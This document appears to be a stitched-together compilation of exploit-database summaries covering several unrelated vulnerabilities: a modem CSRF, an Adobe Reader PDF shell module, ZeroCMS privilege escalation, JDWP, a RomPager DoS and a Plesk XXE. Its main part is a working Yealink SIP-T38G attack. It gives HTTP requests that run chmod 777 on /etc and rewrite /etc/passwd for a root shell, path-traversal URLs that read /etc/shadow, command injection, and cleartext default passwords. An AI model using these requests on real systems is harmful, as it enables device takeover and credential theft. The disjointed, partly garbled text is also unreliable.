It was observed that this modem's web application is vulnerable to cross-site request forgery, through which an attacker could manipulate user data by sending the victim a maliciously crafted URL. An attacker could change the username, password, DNS service and host name of the victim's account without the victim's knowledge.
Adobe Reader versions less than 11.2.0 expose insecure native interfaces to untrusted JavaScript in a PDF. This module embeds the browser exploit from android/webview_addjavascriptinterface into a PDF to get a command shell on vulnerable versions of Reader.
ZeroCMS is a very simple Content Management System built using PHP and MySQL. The script zero_transact_user.php contains a Modify Account case where the execution context doesn't take into consideration the current user's permissions, allowing a malicious user to escalate their privileges to admin.
Because cgiServer.exx runs with root privileges, we use the command execution (CVE-2013-5758) to modify the system file restrictions. Then we add extra privileges to the guest account.
Step 1 - Changing the /etc folder rights to 777:
    POST /cgi-bin/cgiServer.exx HTTP/1.1
    Host: 10.0.75.122
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0

    system("/bin/busybox%20chmod%20-R%20777%20/etc")
Step 2 - Change the guest user uid:
    POST /cgi-bin/cgiServer.exx HTTP/1.1
    Host: 10.0.75.122
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0

    system("echo "root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:0:0:Guest,,,:/:/bin/sh" > /etc/passwd"")
Step 3 - Connect back using telnet and the guest account (password is guest):
    # id
    uid=0(root) gid=0(root)
Enjoy your root shell :)
This module exploits a vulnerability in the JDWP protocol, which is used for debugging Java applications. The vulnerability allows an attacker to send malicious packets to the target, which can be used to execute arbitrary code.
Using cgiServer.exx, we are able to send OS commands using the system function.
The web interface contains a vulnerability that allows any page to be included. We are able to disclose /etc/passwd and /etc/shadow.
Using the page parameter (CVE-2013-5756):
    http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
    http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
Using the command parameter (CVE-2013-5757):
    http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
* By viewing the shadow file, we are able to conclude that cgiServer.exx runs with root privileges. This leads to CVE-2013-5759.
The web interface of the Yealink VoIP Phone SIP-T38G uses hardcoded default credentials in the /config/.htpasswd file. The cleartext passwords for these accounts are user:user, admin:admin, and var:var.
This exploit is a proof of concept for a denial of service vulnerability in the RomPager web server, which is used in ZTE and TP-Link routers. The exploit sends a specially crafted HTTP request to the router, which causes the router to crash and reboot.
Plesk SSO XXE injection (old bug): a vulnerability in Plesk SSO that allows an attacker to inject malicious XML into the application. This exploit was discovered by z00 in 2014 and affects versions 11.0.9 and 10.4.4. It allows an attacker to execute arbitrary commands on the server, read files, and access sensitive information.